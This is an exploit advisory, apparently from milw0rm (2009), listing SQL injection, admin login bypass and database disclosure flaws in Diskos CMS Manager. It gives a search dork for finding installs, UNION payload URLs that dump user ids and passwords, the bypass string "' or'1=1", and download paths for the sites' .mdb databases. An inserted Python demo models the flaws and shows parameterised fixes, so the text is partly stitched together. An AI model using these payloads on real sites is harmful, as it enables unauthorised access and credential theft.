************************************************************
**
** Diskos CMS Manager - multiple vulnerabilities
**
************************************************************
**
** Product : Diskos CMS Manager
**
** Home : http://www.diskos.dk
**
** Vulnerabilities : SQL injection, admin login bypass, database disclosure
**
** Dork : "Powered By diskos"
**
** inurl:"side.asp?kat=1"
**
************************************************************
**
** Discovered by : AnGeL25dZ
**
** Contact : angel25dz@gmail.com
**
************************************************************
**
** Greetz to : ALLAH
**
** All Members of H-T (http://h-t.cc/cc)
**
** All Members of Islam-attack.com
**
*************************************************************
******************** SQL Injection **************************
**
** Exploit:
**
** The 'kat' parameter of side.asp ends up in the page query unescaped, so
** a non-matching id followed by a UNION pulls rows from the 'brugere'
** (users) table into the rendered page. The single-column payloads below
** work only if the page query itself selects one column, which is what
** the payloads imply.
**
** USERS : http://[PATH]/side.asp?kat=-1+union+all+select+brugerid+from+brugere
**
** ADMIN (passwords) : http://[PATH]/side.asp?kat=-1+union+all+select+password+from+brugere
**
** Administration Login : http://[path]/diskos6/
**
*************************************************************
********************** Admin bypass **************************
**
** Administration Login : http://[path]/diskos6/
**
** brugerid: ' or'1=1
**
** password: ' or'1=1
**
** Both fields are concatenated into the login query, so the injected
** OR clause makes the credential check succeed without a valid account.
**
****************************************************************
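The two injection points above, modelled in Python against an in-memory SQLite database. This is an added example, not code from the advisory or from Diskos; the query shapes of side.asp and the diskos6 login are assumptions inferred from the payloads, SQLite stands in for the Access .mdb (Jet SQL quirks are not modelled), and the 'kategorier' table, all rows and the hardened variants are constructed for the demo. Only the table and column names 'brugere', 'brugerid' and 'password' come from the advisory.

```python
import sqlite3
from urllib.parse import unquote_plus

# Payloads taken from the advisory. The '+' in the URLs is form-encoded
# space, so decode them the way the ASP request parser would.
USERS_PAYLOAD = unquote_plus("-1+union+all+select+brugerid+from+brugere")
ADMIN_PAYLOAD = unquote_plus("-1+union+all+select+password+from+brugere")
BYPASS = "' or'1=1"


def make_db():
    """Constructed stand-in for the CMS's Access .mdb: an in-memory SQLite
    database. 'brugere', 'brugerid' and 'password' come from the advisory;
    'kategorier' and every row are invented for the demo (plaintext
    passwords included, since the advisory dumps that column)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE kategorier (id INTEGER, navn TEXT);
        INSERT INTO kategorier VALUES (1, 'Forside'), (2, 'Nyheder');
        CREATE TABLE brugere (brugerid TEXT, password TEXT);
        INSERT INTO brugere VALUES ('admin', 's3cret'), ('redaktor', 'hunter2');
    """)
    return con


def side_vulnerable(con, kat):
    """Assumed shape of side.asp: the 'kat' query-string value is pasted
    straight into the SQL. A one-column SELECT is assumed, which is what
    the advisory's single-column UNION payloads require."""
    sql = "SELECT navn FROM kategorier WHERE id=" + kat
    return [row[0] for row in con.execute(sql)]


def side_fixed(con, kat):
    """Hardened version: the id must parse as an integer and is bound as a
    parameter, so the UNION payload never reaches the database."""
    try:
        kat_id = int(kat)
    except ValueError:
        return None  # caller renders 'not found' instead of running SQL
    rows = con.execute("SELECT navn FROM kategorier WHERE id=?", (kat_id,))
    return [row[0] for row in rows]


def login_vulnerable(con, brugerid, password):
    """Assumed shape of the diskos6 login check: both fields concatenated
    into one WHERE clause. With the advisory's payload in both fields the
    SQL becomes
      ... WHERE brugerid='' or'1=1' AND password='' or'1=1'
    and the trailing OR '1=1' (truthy) makes the row count non-zero."""
    sql = ("SELECT COUNT(*) FROM brugere WHERE brugerid='" + brugerid +
           "' AND password='" + password + "'")
    return con.execute(sql).fetchone()[0] > 0


def login_fixed(con, brugerid, password):
    """Hardened version: parameter binding keeps the quotes as data."""
    row = con.execute(
        "SELECT COUNT(*) FROM brugere WHERE brugerid=? AND password=?",
        (brugerid, password)).fetchone()
    return row[0] > 0


def demo():
    """Run every case once and return the results for inspection."""
    con = make_db()
    return {
        "normal_page": side_vulnerable(con, "1"),
        "union_dump_users": side_vulnerable(con, USERS_PAYLOAD),
        "union_dump_passwords": side_vulnerable(con, ADMIN_PAYLOAD),
        "fixed_rejects_union": side_fixed(con, USERS_PAYLOAD),
        "fixed_normal_page": side_fixed(con, "1"),
        "bypass_vulnerable": login_vulnerable(con, BYPASS, BYPASS),
        "bypass_fixed": login_fixed(con, BYPASS, BYPASS),
        "fixed_real_creds": login_fixed(con, "admin", "s3cret"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Two caveats carry over to the real target: if side.asp selects more than one column, the UNION must supply the same number of columns (pad with NULLs or literals), and the bypass string only works when both fields land in one concatenated WHERE clause as modelled here.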
******************** database disclosure **********************
**
** The CMS keeps its Access databases under the web root, where they
** can be fetched directly:
**
** http://[path]/db/log.mdb
**
** artikler_prod.mdb
**
** medlemmer.mdb
**
** A download whose bytes at offset 4 read "Standard Jet DB" (the
** Jet/Access file signature) confirms it is the live database rather
** than an error page.
**
******************************************************************
**
** Live demo : http://www.diskos.dk/
**
****************************************************************

# milw0rm.com [2009-03-30]